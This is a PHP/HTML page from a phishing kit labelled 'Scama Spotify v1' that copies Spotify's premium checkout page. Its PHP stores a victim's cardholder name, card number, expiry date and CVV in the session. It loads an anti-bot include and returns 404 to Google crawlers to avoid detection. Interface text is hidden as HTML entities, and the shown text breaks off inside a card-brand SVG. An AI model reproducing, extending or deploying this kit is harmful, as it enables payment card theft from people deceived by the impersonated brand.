<?php   
/*
 $$$$$$\  $$$$$$$\   $$$$$$\  $$\   $$\      $$$$$$$$\ $$\   $$\ 
$$  __$$\ $$  __$$\ $$  __$$\ $$$\  $$ |     \__$$  __|$$$\  $$ |
$$ /  $$ |$$ |  $$ |$$ /  $$ |$$$$\ $$ |        $$ |   $$$$\ $$ |
$$$$$$$$ |$$$$$$$  |$$ |  $$ |$$ $$\$$ |$$$$$$\ $$ |   $$ $$\$$ |
$$  __$$ |$$  __$$< $$ |  $$ |$$ \$$$$ |\______|$$ |   $$ \$$$$ |
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ |\$$$ |        $$ |   $$ |\$$$ |
$$ |  $$ |$$ |  $$ | $$$$$$  |$$ | \$$ |        $$ |   $$ | \$$ |
\__|  \__|\__|  \__| \______/ \__|  \__|        \__|   \__|  \__|
                                                                 
#==========================================#
#             Scama Spotify v1             #
#       facebook: fb.com/amyr.gov.tn       #
#==========================================#

 $$$$$$\   $$$$$$\    $$\   $$$$$$\  
$$  __$$\ $$$ __$$\ $$$$ | $$  __$$\ 
\__/  $$ |$$$$\ $$ |\_$$ | $$ /  $$ |
 $$$$$$  |$$\$$\$$ |  $$ | \$$$$$$$ |
$$  ____/ $$ \$$$$ |  $$ |  \____$$ |
$$ |      $$ |\$$$ |  $$ | $$\   $$ |
$$$$$$$$\ \$$$$$$  /$$$$$$\\$$$$$$  |
\________| \______/ \______|\______/ 
*/                                                                                               
session_start();
error_reporting(0);
$_SESSION['_holder_']    = $_POST['cc_holder'];
$_SESSION['_cc_']    = $_POST['cc_number'];
$_SESSION['_exp_y']     = $_POST['expirationY'];
$_SESSION['_exp_m']     = $_POST['expirationM'];
$_SESSION['_cvv_']     = $_POST['cvv'];
include "../../../ARONXBOT/XSPOTIFYXBOT.php";
if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
?>
<!DOCTYPE html>
<html lang="fr" xmlns:og="http://ogp.me/ns#" xmlns:fb="https://www.facebook.com/2008/fbml" class="" >
<head>
<style>.async-hide { opacity: 0 !important}</style>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
<title>&#x53;&#x70;&#x6f;&#x74;&#x69;&#x66;&#x79;</title>
<link rel="icon" href="//www.scdn.co/i/_global/favicon.png">
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="//www.scdn.co/i/_global/touch-icon-144.png">
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="//www.scdn.co/i/_global/touch-icon-114.png">
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="//www.scdn.co/i/_global/touch-icon-72.png">
<link rel="apple-touch-icon-precomposed" href="//www.scdn.co/i/_global/touch-icon-57.png">    
<link rel="stylesheet" href="//www.scdn.co/build/css/premium-checkout-d5de6e77f8.css"/>
</head>
<body class="m-tn-fr l-fr page-purchase-offer-full-price-premium is-loggedin  premium-checkout">

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" style="display:none">
 <symbol id="spotify-logo" viewBox="0 0 827.79999 248.275">
  <g transform="matrix(1.25 0 0 -1.25 0 248.28)">
   <g transform="scale(.1)">
    <path d="m1580.6 1105.8c-320.13 190.11-848.16 207.59-1153.8 114.84-49.078-14.89-100.97 12.82-115.84 61.89-14.872 49.1 12.8 100.96 61.914 115.88 350.8 106.49 933.97 85.91 1302.5-132.85 44.14-26.2 58.62-83.21 32.45-127.28-26.18-44.14-83.24-58.69-127.27-32.48zm-10.5-281.56c-22.46-36.449-70.11-47.867-106.51-25.5-266.88 164.05-673.86 211.58-989.6 115.73-40.945-12.367-84.191 10.722-96.629 51.582-12.339 40.949 10.754 84.119 51.629 96.569 360.7 109.45 809.1 56.44 1115.6-131.94 36.4-22.41 47.86-70.078 25.48-106.44zm-121.5-270.43c-17.84-29.258-55.95-38.43-85.1-20.598-233.22 142.54-526.75 174.73-872.45 95.758-33.312-7.629-66.511 13.25-74.109 46.551-7.633 33.312 13.164 66.511 46.555 74.109 378.3 86.48 702.8 49.269 964.57-110.69 29.19-17.832 38.38-55.953 20.53-85.132zm-455.48 1432.4c-548.48 0-993.12-444.6-993.12-993.06 0-548.53 444.64-993.14 993.12-993.14 548.5 0 993.12 444.61 993.12 993.14 0 548.47-444.62 993.1-993.12 993.1"/>
    <path d="m2701.9 1069.4c-171.46 40.89-202 69.59-202 129.88 0 56.99 53.64 95.31 133.41 95.31 77.32 0 153.98-29.11 234.37-89.05 2.44-1.81 5.48-2.54 8.48-2.06 3 0.45 5.66 2.09 7.41 4.57l83.73 118.03c3.44 4.86 2.5 11.56-2.13 15.27-95.67 76.77-203.4 114.09-329.32 114.09-185.15 0-314.46-111.1-314.46-270.08 0-170.48 111.55-230.83 304.33-277.43 164.08-37.789 191.78-69.449 191.78-126.07 0-62.719-56-101.71-146.11-101.71-100.09 0-181.73 33.719-273.06 112.8-2.27 1.953-5.37 2.851-8.24 2.679-3.02-0.25-5.78-1.648-7.71-3.957l-93.87-111.72c-3.94-4.641-3.44-11.559 1.11-15.578 106.26-94.86 236.94-144.97 377.97-144.97 199.51 0 328.42 109.02 328.42 277.74 0 142.59-85.19 221.45-294.11 272.26"/>
    <path d="m3592.2 878.31c0-120.4-74.17-204.42-180.36-204.42-105 0-184.19 87.839-184.19 204.42 0 116.57 79.19 204.42 184.19 204.42 104.48 0 180.36-85.949 180.36-204.42zm-144.83 360.22c-86.47 0-157.4-34.06-215.9-103.85v78.56c0 6.19-5.03 11.25-11.22 11.25h-153.53c-6.2 0-11.22-5.06-11.22-11.25v-872.86c0-6.199 5.02-11.25 11.22-11.25h153.53c6.19 0 11.22 5.051 11.22 11.25v275.52c58.51-65.66 129.45-97.726 215.9-97.726 160.69 0 323.34 123.69 323.34 360.14 0 236.5-162.65 360.22-323.34 360.22"/>
    <path d="m4187.7 672.63c-110.07 0-193.05 88.43-193.05 205.68 0 117.75 80.11 203.19 190.51 203.19 110.77 0 194.31-88.43 194.31-205.76 0-117.72-80.65-203.11-191.77-203.11zm0 565.9c-206.94 0-369.05-159.34-369.05-362.79 0-201.24 161-358.9 366.51-358.9 207.66 0 370.27 158.8 370.27 361.47 0 202-161.49 360.22-367.73 360.22"/>
    <path d="m4997.3 1224.5h-168.95v172.74c0 6.2-5.01 11.25-11.21 11.25h-153.52c-6.21 0-11.26-5.05-11.26-11.25v-172.74h-73.83c-6.18 0-11.18-5.06-11.18-11.25v-131.95c0-6.2 5-11.25 11.18-11.25h73.83v-341.45c0-137.98 68.67-207.94 204.12-207.94 55.07 0 100.77 11.372 143.83 35.801 3.5 1.949 5.68 5.723 5.68 9.731v125.66c0 3.871-2.03 7.531-5.34 9.57-3.35 2.102-7.51 2.199-10.93 0.5-29.58-14.879-58.18-21.738-90.13-21.738-49.26 0-71.24 22.359-71.24 72.488v317.38h168.95c6.21 0 11.21 5.05 11.21 11.25v131.95c0 6.19-5 11.25-11.21 11.25"/>
    <path d="m5586 1223.8v21.22c0 62.41 23.92 90.24 77.6 90.24 32.01 0 57.72-6.36 86.52-15.96 3.54-1.12 7.24-0.56 10.12 1.56 2.96 2.12 4.64 5.53 4.64 9.13v129.38c0 4.95-3.18 9.33-7.94 10.78-30.42 9.05-69.33 18.34-127.61 18.34-141.82 0-216.77-79.86-216.77-230.86v-32.49h-73.76c-6.19 0-11.27-5.05-11.27-11.25v-132.62c0-6.2 5.08-11.25 11.27-11.25h73.76v-526.66c0-6.199 5-11.25 11.19-11.25h153.54c6.2 0 11.25 5.051 11.25 11.25v526.66h143.35l219.59-526.52c-24.93-55.329-49.44-66.329-82.91-66.329-27.05 0-55.53 8.071-84.65 24.008-2.75 1.5-5.99 1.762-8.95 0.84-2.93-1.027-5.4-3.207-6.64-6.059l-52.04-114.17c-2.48-5.387-0.36-11.727 4.83-14.528 54.33-29.422 103.37-41.98 163.98-41.98 113.37 0 176.03 52.808 231.28 194.89l266.36 688.3c1.34 3.46 0.94 7.37-1.18 10.44-2.11 3.05-5.51 4.89-9.24 4.89h-159.83c-4.78 0-9.07-3.04-10.63-7.54l-164-467.82-179.3 468.02c-1.64 4.35-5.83 7.23-10.49 7.23h-262.28"/>
    <path d="m5244.7 1224.5h-153.54c-6.2 0-11.25-5.06-11.25-11.25v-669.86c0-6.199 5.05-11.25 11.25-11.25h153.54c6.19 0 11.25 5.051 11.25 11.25v669.86c0 6.19-5.06 11.25-11.25 11.25"/>
    <path d="m5168.7 1529.5c-60.82 0-110.19-49.24-110.19-110.06 0-60.87 49.37-110.16 110.19-110.16 60.8 0 110.11 49.29 110.11 110.16 0 60.82-49.31 110.06-110.11 110.06"/>
    <path d="m6520.1 1157.9h-28.14v-35.88h28.14c14.04 0 22.42 6.87 22.42 17.95 0 11.67-8.38 17.93-22.42 17.93zm18.23-51.18 30.57-42.79h-25.77l-27.51 39.25h-23.66v-39.25h-21.57v113.42h50.58c26.34 0 43.68-13.48 43.68-36.18 0-18.59-10.74-29.95-26.32-34.45zm-23.95 108.37c-55.35 0-97.23-43.99-97.23-97.87 0-53.84 41.58-97.25 96.66-97.25 55.33 0 97.25 43.96 97.25 97.87 0 53.84-41.61 97.25-96.68 97.25zm-0.57-205.93c-60.76 0-108.05 48.8-108.05 108.06 0 59.27 47.9 108.62 108.62 108.62 60.76 0 108.04-48.79 108.04-108 0-59.27-47.86-108.68-108.61-108.68"/>
   </g>
  </g>
 </symbol>
 <symbol id="facebook-icon" viewBox="0 0 448 448">
  <path d="m119.75 242.25v-74h63.75v-54.5q0-46.5 26-72.125t69.25-25.625q36.75 0 57 3v66h-39.25q-21.5 0-29 9t-7.5 27v47.25h73.25l-9.75 74h-63.5v189.75h-76.5v-189.75h-63.75z"/>
 </symbol>
 <symbol id="twitter-icon" viewBox="0 0 448 448">
  <path d="m27 347.75q8.75 1 19.5 1 56.25 0 100.25-34.5-26.25-0.5-47-16.125t-28.5-39.875q8.25 1.25 15.25 1.25 10.75 0 21.25-2.75-28-5.75-46.375-27.875t-18.375-51.375v-1q17 9.5 36.5 10.25-16.5-11-26.25-28.75t-9.75-38.5q0-22 11-40.75 30.25 37.25 73.625 59.625t92.875 24.875q-2-9.5-2-18.5 0-33.5 23.625-57.125t57.125-23.625q35 0 59 25.5 27.25-5.25 51.25-19.5-9.25 28.75-35.5 44.5 23.25-2.5 46.5-12.5-16.75 24.5-40.5 41.75 0.25 3.5 0.25 10.5 0 32.5-9.5 64.875t-28.875 62.125-46.125 52.625-64.5 36.5-80.75 13.625q-67.75 0-124-36.25z"/>
 </symbol>
 <symbol id="instagram-icon" viewBox="0 0 448 448">
   <path d="M224,40.376 C283.808,40.376 290.901333,40.6 314.533333,41.6826667 C375.237333,44.4453333 403.592,73.248 406.354667,133.504 C407.437333,157.117333 407.642667,164.210667 407.642667,224.018667 C407.642667,283.845333 407.418667,290.92 406.354667,314.533333 C403.573333,374.733333 375.293333,403.592 314.533333,406.354667 C290.901333,407.437333 283.845333,407.661333 224,407.661333 C164.192,407.661333 157.098667,407.437333 133.485333,406.354667 C72.632,403.573333 44.4266667,374.64 41.664,314.514667 C40.5813333,290.901333 40.3573333,283.826667 40.3573333,224 C40.3573333,164.192 40.6,157.117333 41.664,133.485333 C44.4453333,73.248 72.7253333,44.4266667 133.485333,41.664 C157.117333,40.6 164.192,40.376 224,40.376 L224,40.376 Z M224,-1.57772181e-30 C163.165333,-1.57772181e-30 155.549333,0.261333333 131.656,1.344 C50.3066667,5.07733333 5.096,50.2133333 1.36266667,131.637333 C0.261333333,155.549333 -9.06682137e-15,163.165333 -9.06682137e-15,224 C-9.06682137e-15,284.834667 0.261333333,292.469333 1.344,316.362667 C5.07733333,397.712 50.2133333,442.922667 131.637333,446.656 C155.549333,447.738667 163.165333,448 224,448 C284.834667,448 292.469333,447.738667 316.362667,446.656 C397.637333,442.922667 442.96,397.786667 446.637333,316.362667 C447.738667,292.469333 448,284.834667 448,224 C448,163.165333 447.738667,155.549333 446.656,131.656 C442.997333,50.3813333 397.805333,5.096 316.381333,1.36266667 C292.469333,0.261333333 284.834667,-9.06682137e-15 224,-9.06682137e-15 L224,-1.57772181e-30 Z M224,108.976 C160.477333,108.976 108.976,160.477333 108.976,224 C108.976,287.522667 160.477333,339.042667 224,339.042667 C287.522667,339.042667 339.024,287.541333 339.024,224 C339.024,160.477333 287.522667,108.976 224,108.976 Z M224,298.666667 C182.765333,298.666667 149.333333,265.253333 149.333333,224 C149.333333,182.765333 182.765333,149.333333 224,149.333333 C265.234667,149.333333 298.666667,182.765333 298.666667,224 C298.666667,265.253333 265.234667,298.666667 224,298.666667 Z M343.578667,77.56 C328.72,77.56 316.68,89.6 316.68,104.44 C316.68,119.28 328.72,131.32 343.578667,131.32 C358.418667,131.32 370.44,119.28 370.44,104.44 C370.44,89.6 358.418667,77.56 343.578667,77.56 Z" />
 </symbol>
 <symbol id="user-icon" viewBox="0 0 1024 1024">
  <path d="m730.06 679.64q-45.377 53.444-101.84 83.443t-120 29.999q-64.032 0-120.75-30.503t-102.6-84.451q-40.335 13.109-77.645 29.747t-53.948 26.722l-17.142 10.084q-29.747 19.159-51.175 57.729t-21.428 73.107 25.461 59.242 60.754 24.705h716.95q35.293 0 60.754-24.705t25.461-59.242-21.428-72.603-51.679-57.225q-6.554-4.033-18.907-10.84t-51.427-24.453-79.409-30.755zm-221.84 25.72q-34.285 0-67.561-14.873t-60.754-40.335-51.175-60.502-40.083-75.124-25.461-84.451-9.075-87.728q0-64.032 19.915-116.22t54.452-85.964 80.67-51.931 99.072-18.151 99.072 18.151 80.67 51.931 54.452 85.964 19.915 116.22q0 65.04-20.167 130.58t-53.948 116.72-81.426 83.443-98.568 32.268z"/>
 </symbol>
<symbol id="chevron-down" viewBox="0 0 1024 1024">
  <path class="path1" d="M476.455 806.696l-381.164-381.164q-14.621-14.621-14.621-35.293t14.621-34.789 35.293-14.117 34.789 14.117l342.846 343.35 349.4-349.4q14.621-14.117 35.293-14.117t34.789 14.117 14.117 34.789-14.117 34.789l-381.164 381.164q-19.159 19.159-38.318 19.159t-31.764-12.605z"></path>
</symbol>
<symbol id="scroll-down" viewBox="643.5 386 22.1 21.9">
  <path d="M665.6,396.3c0,0.3-0.1,0.7-0.4,0.9l-9.8,10.4c-0.5,0.5-1.3,0.5-1.7,0l-9.8-10.4c-0.5-0.5-0.5-1.3,0-1.8
    s1.3-0.5,1.7,0l8.9,9.5l8.9-9.5c0.5-0.5,1.3-0.5,1.7,0C665.5,395.6,665.6,396,665.6,396.3z">
  <path d="M665.6,387.3c0,0.3-0.1,0.7-0.4,0.9l-9.8,10.4c-0.5,0.5-1.3,0.5-1.7,0l-9.8-10.4c-0.5-0.5-0.5-1.3,0-1.8
    s1.3-0.5,1.7,0l8.9,9.5l8.9-9.5c0.5-0.5,1.3-0.5,1.7,0C665.5,386.6,665.6,387,665.6,387.3z">
</symbol>
</svg>
<div id="fb-root"></div>
<div class="wrap">
<header id="js-navbar" class="navbar navbar-default navbar-static-top " role="banner">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="sidepanel" data-target="#navbar-nav">
<span class="sr-only">&#x54;&#x6f;&#x67;&#x67;&#x6c;&#x65;&#x20;&#x6e;&#x61;&#x76;&#x69;&#x67;&#x61;&#x74;&#x69;&#x6f;&#x6e;</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<ul class="nav">
<li class="dropdown">
<a href="#" class="user-link dropdown-toggle hidden-xs hidden-sm"><div class="user-icon-container img-circle navbar-user-img"><svg class="user-icon"><use xlink:href="#user-icon"></svg></div></a>
<a href="#" class="user-link hidden-md hidden-lg"><div class="user-icon-container img-circle navbar-user-img"><svg class="user-icon"><use xlink:href="#user-icon"></svg></div></a>
<ul class="dropdown-menu dropdown-menu-right">
<li><a href="#">&#x41;&#x63;&#x63;&#x6f;&#x75;&#x6e;&#x74;</a></li>
<li><a href="#">&#x53;&#x69;&#x67;&#x6e;&#x20;&#x6f;&#x75;&#x74;</a></li>
</ul>
</li>
</ul>
<a href="#" class="user-link hidden"><div class="user-icon-container img-circle navbar-user-img"><svg class="user-icon"><use xlink:href="#user-icon"></svg></div></a>
<a class="navbar-brand" href="#"><span class="navbar-logo">&#x53;&#x70;&#x6f;&#x74;&#x69;&#x66;&#x79;</span></a>
</div>
<div class="collapse navbar-collapse" id="navbar-nav">
<ul class="nav navbar-nav navbar-right"><li class="sidepanel-item-large hidden-md hidden-lg " ><a href="#" id="nav-link-account">&#x41;&#x63;&#x63;&#x6f;&#x75;&#x6e;&#x74;</a></li>
<li class="sidepanel-item-large hidden-md hidden-lg "><a href="#" id="nav-link-log out">&#x53;&#x69;&#x67;&#x6e;&#x20;&#x6f;&#x75;&#x74;</a></li>
<li class="dropdown alternate hidden-sidepanel">
<a href="#" class="user-link dropdown-toggle">
<div class="user-icon-container img-circle navbar-user-img">
<svg class="user-icon"><use xlink:href="#user-icon"></svg></div>
<span class="user-text">&#x50;&#x72;&#x6f;&#x66;&#x69;&#x6c;&#x65;</span>
<svg class="svg-chevron-down"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#chevron-down"></use></svg>
</a>
</li>
</ul>
</div>
</div>
</header>
<div class="premium-checkout-container">
<div class="container checkout-content">
<div class="row">
<div class="col-sm-8 col-sm-offset-2 col-lg-10 col-lg-offset-1">
<div class="row">
<div class="col-md-10 col-md-offset-1 col-lg-6 col-lg-offset-3">
<link rel="stylesheet" href="//www.scdn.co/build/css/checkout-2b4c917917.css"/>  
<div class="embeddable-checkout">
<section class="checkout-form" data-checkout-panel>
<div data-payment-picker>
<div data-payment-picker-compact class="payment-picker payment-picker-compact">
<ul data-payment-picker-header class="list-unstyled payment-picker-header multi">
</ul>
<div data-payment-picker-other-menu class="payment-picker-other-menu">
<ul data-payment-picker-other-options class="list-unstyled payment-picker-other-options">
<li class="payment-method" data-payment-method data-name="billing_adyen_cards">
<div class="payment-method-label">&#67;&#114;&#101;&#100;&#105;&#116;&#32;&#111;&#114;&#32;&#100;&#101;&#98;&#105;&#116;&#32;&#99;&#97;&#114;&#100;</div>
<ul class="list-unstyled payment-method-icons">
<li class="payment-method-icon">
<svg viewBox="0 0 350 250" xmlns="http://www.w3.org/2000/svg">
    <path fill="#F8F8F8" d="M320 250H30c-16.6 0-30-13.4-30-30V30C0 13.4 13.4 0 30 0h290c16.6 0 30 13.4 30 30v190c0 16.6-13.4 30-30 30z"/>
    <path fill="#E7E7E7" d="M320 10c11 0 20 9 20 20v190c0 11-9 20-20 20H30c-11 0-20-9-20-20V30c0-11 9-20 20-20h290m0-10H30C13.4 0 0 13.4 0 30v190c0 16.6 13.4 30 30 30h290c16.6 0 30-13.4 30-30V30c0-16.6-13.4-30-30-30z"/>
    <path fill="#0F2496" d="M146.9 82.1l-18.4 85.4h22.2l18.4-85.4h-22.2zm143 0H271c-4.2 0-7.9 2.5-9.4 6.2l-33.4 79.2h23.3l4.6-12.8h28.5l2.7 12.8h20.6l-18-85.4zm-27.3 55.1l11.6-32 6.7 32h-18.3zM114 82.1l-23.1 58.1-9.4-49.4c-1.2-5.6-5.4-8.8-10.3-8.8H33.6l-.5 2.5c7.8 1.7 16.5 4.4 21.9 7.2 3.2 1.9 4.2 3.4 5.2 7.6l17.7 68.3h23.4l36.1-85.4H114v-.1zm84.3 23.8c0-3 3-6.4 9.4-7.1 3.2-.3 12-.7 21.9 3.9l3.9-18.2c-5.4-1.9-12.3-3.7-20.7-3.7-21.9 0-37.4 11.6-37.6 28.3-.2 12.3 11.1 19.2 19.4 23.3 8.6 4.2 11.6 6.9 11.5 10.6 0 5.7-6.9 8.3-13.3 8.4-11.1.2-17.7-3-22.8-5.4l-4 18.7c5.2 2.4 14.8 4.4 24.8 4.6 23.4 0 38.6-11.5 38.8-29.2-.2-22.9-31.5-24.3-31.3-34.2z" />
</svg>
</li>
<li class="payment-method-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 350 250">
    <path fill="#F8F8F8" d="M320 250H30c-16.6 0-30-13.4-30-30V30C0 13.4 13.4 0 30 0h290c16.6 0 30 13.4 30 30v190c0 16.6-13.4 30-30 30z"/>
    <path fill="#E7E7E7" d="M320 10c11 0 20 9 20 20v190c0 11-9 20-20 20H30c-11 0-20-9-20-20V30c0-11 9-20 20-20h290m0-10H30C13.4 0 0 13.4 0 30v190c0 16.6 13.4 30 30 30h290c16.6 0 30-13.4 30-30V30c0-16.6-13.4-30-30-30z"/>
    <path fill="#F79F1A" d="M275.805 125.015c0 34.514-27.95 62.465-62.344 62.465s-62.343-27.95-62.343-62.465S179.07 62.55 213.46 62.55s62.345 27.95 62.345 62.465z"/>
    <path fill="#EA001B" d="M198.878 125.015c0 34.514-27.952 62.465-62.344 62.465S74.19 159.53 74.19 125.015s27.95-62.466 62.344-62.466 62.344 27.95 62.344 62.465z"/>
    <path fill="#FF5F01" d="M174.937 75.796c-14.584 11.423-23.82 29.167-23.82 49.22s9.358 37.794 23.82 49.218c14.583-11.424 23.82-29.167 23.82-49.22s-9.237-37.795-23.82-49.218z"/>
</svg>
</li>
<li class="payment-method-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 350 250">
  <g fill="none" fill-rule="nonzero">
    <path fill="#016FD0" d="M320 250H30c-16.6 0-30-13.4-30-30V30C0 13.4 13.4 0 30 0h290c16.6 0 30 13.4 30 30v190c0 16.6-13.4 30-30 30z"/>
    <path fill="#EAEAEA" d="M320 10c11 0 20 9 20 20v190c0 11-9 20-20 20H30c-11 0-20-9-20-20V30c0-11 9-20 20-20h290zm0-10H30C13.4 0 0 13.4 0 30v190c0 16.6 13.4 30 30 30h290c16.6 0 30-13.4 30-30V30c0-16.6-13.4-30-30-30z"/>
    <path fill="#FFF" d="M74.06 186v-51.94h54.857l5.886 7.691 6.08-7.692H340v48.36s-5.207 3.529-11.23 3.581H218.515l-6.636-8.188V186h-21.744v-13.977s-2.97 1.952-9.392 1.952h-7.402V186h-32.923l-5.878-7.857-5.967 7.857H74.06zM10 94.913L22.37 66h21.394l7.02 16.196V66h26.594l4.18 11.706L85.607 66h119.38v5.885S211.264 66 221.578 66l38.734.136 6.899 15.983V66h22.255l6.126 9.182V66h22.459v51.94h-22.46l-5.87-9.211v9.211h-32.697l-3.289-8.188h-8.79l-3.235 8.188h-22.174c-8.875 0-14.548-5.764-14.548-5.764v5.764h-33.434l-6.635-8.188v8.188H40.595l-3.286-8.188h-8.763l-3.262 8.188H10V94.913z"/>
    <path fill="#016FD0" d="M27.66 72.347l-16.593 38.548h10.802l3.062-7.72H42.73l3.045 7.72h11.042L40.239 72.347h-12.58zm6.139 8.97l5.425 13.49H28.358l5.44-13.489zm24.16 29.571V72.34l15.35.057 8.93 24.854 8.715-24.91h15.229v38.547h-9.645V82.484l-10.224 28.404h-8.458L67.603 82.484v28.404h-9.645zm54.823 0V72.34h31.473v8.623h-21.727v6.594h21.22v8.115h-21.22v6.848h21.727v8.368h-31.473zm37.057-38.541v38.548h9.645V97.2h4.06l11.565 13.695h11.786l-12.69-14.202c5.208-.44 10.58-4.906 10.58-11.84 0-8.112-6.372-12.506-13.483-12.506h-21.463zm9.645 8.622h11.024c2.645 0 4.57 2.067 4.57 4.058 0 2.561-2.494 4.058-4.427 4.058h-11.167v-8.116zm39.087 29.92h-9.848V72.34h9.848v38.548zm23.35 0h-2.125c-10.285 0-16.53-8.097-16.53-19.116 0-11.291 6.175-19.433 19.163-19.433h10.66v9.13h-11.05c-5.272 0-9 4.111-9 10.398 0 7.465 4.263 10.6 10.405 10.6h2.538l-4.06 8.42zm20.988-38.542l-16.593 38.548h10.803l3.061-7.72h17.799l3.046 7.72h11.04l-16.577-38.548h-12.58zm6.139 8.97l5.425 13.49h-10.866l5.44-13.489zm24.144 29.571V72.34h12.262l15.657 24.22V72.34h9.645v38.548H298.89l-16.054-24.853v24.853h-9.644zm-191.883 67.46V139.8h31.473v8.622H91.056v6.594h21.218v8.116H91.056v6.847h21.726v8.37l-31.473-.001zm154.217 0V139.8h31.473v8.622h-21.727v6.594h21.118v8.116h-21.118v6.847h21.726v8.37l-31.472-.001zm-121.523 0l15.324-19.037L113.64 139.8h12.151l9.344 12.063 9.375-12.063h11.675l-15.482 19.275 15.352 19.274h-12.15l-9.072-11.872-8.851 11.872h-11.978zm43.196-38.542v38.548h9.899v-12.173h10.152c8.59 0 15.102-4.554 15.102-13.41 0-7.336-5.107-12.965-13.848-12.965h-21.305zm9.899 8.718h10.692c2.775 0 4.759 1.7 4.759 4.438 0 2.573-1.974 4.438-4.79 4.438h-10.661v-8.876zm29.442-8.725v38.549h9.645v-13.695h4.061l11.564 13.695h11.787l-12.69-14.202c5.207-.44 10.58-4.906 10.58-11.84 0-8.112-6.372-12.507-13.484-12.507H196.54zm9.645 8.623h11.025c2.645 0 4.569 2.067 4.569 4.058 0 2.56-2.493 4.058-4.426 4.058h-11.168v-8.116zm65.28 29.926v-8.37h19.303c2.856 0 4.093-1.541 4.093-3.233 0-1.62-1.233-3.259-4.093-3.259h-8.722c-7.582 0-11.805-4.615-11.805-11.545 0-6.181 3.867-12.142 15.134-12.142h18.782l-4.061 8.674h-16.244c-3.105 0-4.061 1.628-4.061 3.183 0 1.598 1.181 3.36 3.553 3.36h9.137c8.452 0 12.12 4.79 12.12 11.063 0 6.745-4.087 12.269-12.58 12.269h-20.555zm35.4 0v-8.37h19.302c2.856 0 4.093-1.541 4.093-3.233 0-1.62-1.233-3.259-4.093-3.259h-8.722c-7.582 0-11.805-4.615-11.805-11.545 0-6.181 3.867-12.142 15.134-12.142h18.782l-4.061 8.674H319.25c-3.105 0-4.061 1.628-4.061 3.183 0 1.598 1.18 3.36 3.553 3.36h9.137c8.452 0 12.12 4.79 12.12 11.063 0 6.745-4.087 12.269-12.58 12.269h-20.555z"/>
  </g>
</svg>
</li>
<li class="payment-method-icon">
<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 350 250">
    <path fill="#fff" d="M8 10h333v230H8z"/>
    <path fill="#EF7D00" d="M340.552 228.124V147.7s-90.309 63.72-255.714 92.256h237.636c10.155-.312 16.083-3.62 18.078-11.833z"/>
    <path fill="url(#discover_card_logo_paint0_radial)" d="M24.577 0C11.009 0 0 10.6 0 23.682 0 37.59 10.53 47.987 24.577 47.987c13.696 0 24.509-10.535 24.509-24.032C49.086 10.537 38.345 0 24.576 0z" transform="translate(159.813 83.45)"/>
    <path fill="#05171D" fill-rule="evenodd" d="M31.652 84.314h13.213c14.571 0 24.735 9.459 24.736 23.064 0 6.785-3.114 13.348-8.363 17.702-4.425 3.664-9.468 5.316-16.442 5.316H31.652V84.314zm11.41 38.282c5.812 0 9.47-1.108 12.31-3.67 3.11-2.754 4.964-7.185 4.964-11.614 0-4.42-1.854-8.7-4.964-11.465-2.98-2.692-6.498-3.73-12.31-3.73h-2.416v30.48h2.416z" clip-rule="evenodd"/>
    <path fill="#05171D" d="M73.749 84.314h8.979v46.082h-8.98V84.314zm30.963 17.677c-5.398-2-6.985-3.318-6.985-5.796 0-2.905 2.827-5.114 6.703-5.114 2.694 0 4.906 1.104 7.263 3.722l4.692-6.14c-3.869-3.393-8.498-5.118-13.547-5.118-8.146 0-14.37 5.668-14.37 13.194 0 6.363 2.9 9.607 11.333 12.656 3.527 1.237 5.32 2.062 6.22 2.627 1.797 1.174 2.698 2.826 2.698 4.76 0 3.737-2.974 6.498-6.987 6.498-4.284 0-7.737-2.14-9.81-6.147l-5.798 5.603c4.137 6.073 9.114 8.776 15.961 8.776 9.329 0 15.89-6.228 15.89-15.138 0-7.327-3.032-10.646-13.263-14.383zm16.095 5.387c0 13.558 10.644 24.059 24.331 24.059 3.87 0 7.187-.765 11.267-2.692v-10.577c-3.597 3.595-6.777 5.043-10.856 5.043-9.05 0-15.481-6.567-15.481-15.9 0-8.84 6.632-15.821 15.07-15.821 4.278 0 7.532 1.52 11.267 5.182V86.094c-3.939-1.997-7.192-2.82-11.062-2.82-13.617 0-24.536 10.713-24.536 24.104zm108.43 7.892l-12.3-30.956h-9.815l19.564 47.261h4.833l19.906-47.261h-9.741l-12.447 30.955zm26.274 15.127h25.497v-7.8h-16.514v-12.448h15.882v-7.804h-15.882V92.118h16.514v-7.804H255.51v46.083z"/>
    <path fill="#05171D" fill-rule="evenodd" d="M300.282 84.314c10.371 0 16.306 4.967 16.306 13.6 0 7.054-3.725 11.685-10.508 13.072l14.522 19.411h-11.058l-12.433-18.52h-1.176v18.52h-8.993V84.314h13.34zm-4.347 21.211h2.615c5.754 0 8.793-2.497 8.793-7.123 0-4.484-3.04-6.84-8.649-6.84h-2.759v13.963z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M321.4 86.5c.989 0 1.528.438 1.528 1.246 0 .565-.314.985-.883 1.136l1.35 1.678h-1.205l-1.136-1.579v1.579h-.962V86.5h1.308zm-.346 1.798h.18c.477 0 .73-.18.731-.537 0-.345-.243-.519-.722-.519h-.189v1.056z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M318.05 88.519a3.535 3.535 0 0 1 3.544-3.547c1.927 0 3.5 1.603 3.5 3.547 0 1.95-1.573 3.547-3.5 3.547a3.54 3.54 0 0 1-3.544-3.547zm.699.009c0 1.605 1.267 2.902 2.84 2.902 1.53 0 2.791-1.308 2.792-2.902 0-1.596-1.263-2.91-2.791-2.91-1.583 0-2.841 1.289-2.841 2.91z" clip-rule="evenodd"/>
